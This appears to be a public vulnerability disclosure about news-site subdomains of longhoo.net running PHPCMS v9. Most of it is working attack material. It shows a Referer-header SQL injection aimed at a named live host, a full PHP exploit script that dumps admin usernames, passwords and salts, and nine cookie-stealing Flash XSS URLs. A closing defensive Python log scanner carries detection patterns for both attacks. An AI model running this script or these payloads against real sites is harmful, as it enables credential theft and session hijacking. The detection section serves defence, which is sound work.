2016-01-17: Details reported to the vendor, awaiting the vendor's handling. 2016-01-22: The vendor has actively ignored the vulnerability; details are disclosed to the public.
……
The root of the problem is the PHPCMS v9 Referer injection. EXP: http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1
Referer: vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
The modified HTTP headers look like this:
Host: vote.longhoo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=&ltime=1357654307516&rtime=0
Referer: http://vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
Borrowing 独自等待's EXP:
<?php
/**
 * Created by 独自等待
 * User: Hack2012
 * Date: 13-2-4 8:25 PM
 * FileName: phpcmsv9_post_v3.php
 * 独自等待's blog: www.waitalone.cn
 */
print_r('+------------------------------------------------------+
 PHPCMS_V9 poster_click 注入EXP
 Site:http://www.waitalone.cn/
 Exploit BY: 独自等待
 Time:2013-02-19
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('+------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
');
    exit;
}
error_reporting(7);
// timing
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
// get the number of admins
$cmd1 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
    // get the admin table prefix
    preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
    $tableadmin = $prefix_match[1] . '_admin';
    // get the number of admins
    $cmd2 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
    preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
    $count = $num_match[1];
    echo '共有' . $count . '个管理员' . "\n";
    // get admin usernames and data
    if (preg_match('/Duplicate/', send_pack($cmd2))) {
        foreach (range(0, ($count - 1)) as $i) {
            $payload = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
            preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
            if (preg_match('/charset=utf-8/', send_pack($payload))) {
                echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            } else {
                echo $i . '-->' . $admin_match[1] . "\n";
            }
            //echo $admin_match[1]. "\n";
            //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
        }
    }
} else {
    exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}
// function that sends the request packet
function send_pack($cmd)
{
    global $host, $path;
    $data = "GET " . $path . "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= $cmd . "\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Connection: Close\r\n\r\n"; // there must be two \r\n here, otherwise the socket waits forever and returns no data
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout'); // default timeout is 60 seconds
    if (!$fp) {
        echo $errno . '-->' . $errstr;
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}
// timing function
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?>
Finally, a few additional reflected XSS:
http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
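As an added defensive example, not part of this report or of PHPCMS, the following Python scans web-server access logs for the two issues above: the error-based injection delivered through the Referer header of poster_click, and the SWFUpload movieName reflected XSS. The log lines, IP addresses and domain are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse
# Combined log format (client, identd, user, [time], "request", status, bytes, "referer", "ua").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Markers of the error-based MySQL injection used against poster_click: the
# floor(rand(0)*2) + group by duplicate-key trick, information_schema, select...from.
SQLI_MARKERS = re.compile(
    r"(?i)floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema\b|"
    r"\bgroup\s+by\b|\bselect\b.*\bfrom\b|\bconcat\s*\("
)
# A legitimate SWFUpload movieName is an identifier like SWFUpload_0; quotes,
# brackets, braces or script keywords mean it is breaking out of the Flash callback.
XSS_MARKERS = re.compile(r"(?i)['\"\]\)\}\{;<>]|\balert\b|\bcatch\b|document\.")

def is_referer_sqli(referer: str) -> bool:
    """Flag a Referer that both breaks out of a quoted SQL string and carries SQL."""
    decoded = unquote(referer)
    return "'" in decoded and bool(SQLI_MARKERS.search(decoded))

def is_swfupload_xss(path: str) -> bool:
    """Flag a swfupload.swf request whose movieName is not a plain identifier."""
    url = urlparse(path)
    if not url.path.lower().endswith("swfupload.swf"):
        return False
    movie = parse_qs(url.query).get("movieName", [""])[0]
    return bool(XSS_MARKERS.search(unquote(movie)))

def scan_log(text: str) -> list:
    """Return (client_ip, rule_name) for every log line matching either signature."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        if is_referer_sqli(m["referer"]):
            hits.append((m["ip"], "phpcms_poster_click_referer_sqli"))
        if is_swfupload_xss(m["path"]):
            hits.append((m["ip"], "swfupload_movieName_xss"))
    return hits

# Constructed sample traffic (not real logs): benign poster_click hit, injected Referer,
# SWFUpload XSS probe, legitimate SWFUpload load.
SAMPLE_LOG = r'''
203.0.113.5 - - [17/Jan/2016:10:00:01 +0800] "GET /index.php?m=poster&c=index&a=poster_click&id=1 HTTP/1.1" 200 512 "http://vote.example.com/" "Mozilla/5.0"
203.0.113.7 - - [17/Jan/2016:10:00:02 +0800] "GET /index.php?m=poster&c=index&a=poster_click&id=1 HTTP/1.1" 200 1832 "vote.example.com',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),version())a from information_schema.tables group by a)b),'1')#" "Mozilla/5.0"
203.0.113.9 - - [17/Jan/2016:10:00:03 +0800] "GET /statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{alert%281%29}// HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.11 - - [17/Jan/2016:10:00:04 +0800] "GET /statics/js/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
'''
```

Running scan_log(SAMPLE_LOG) reports the second and third lines only; a WAF or SIEM rule built on the same two checks would also have caught the requests shown earlier in this report.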
As above.
Upgrade~
Severity: No impact (ignored by vendor)
Ignored at: 2016-01-22 12:40
Vulnerability Rank: 4 (WooYun rating)
None yet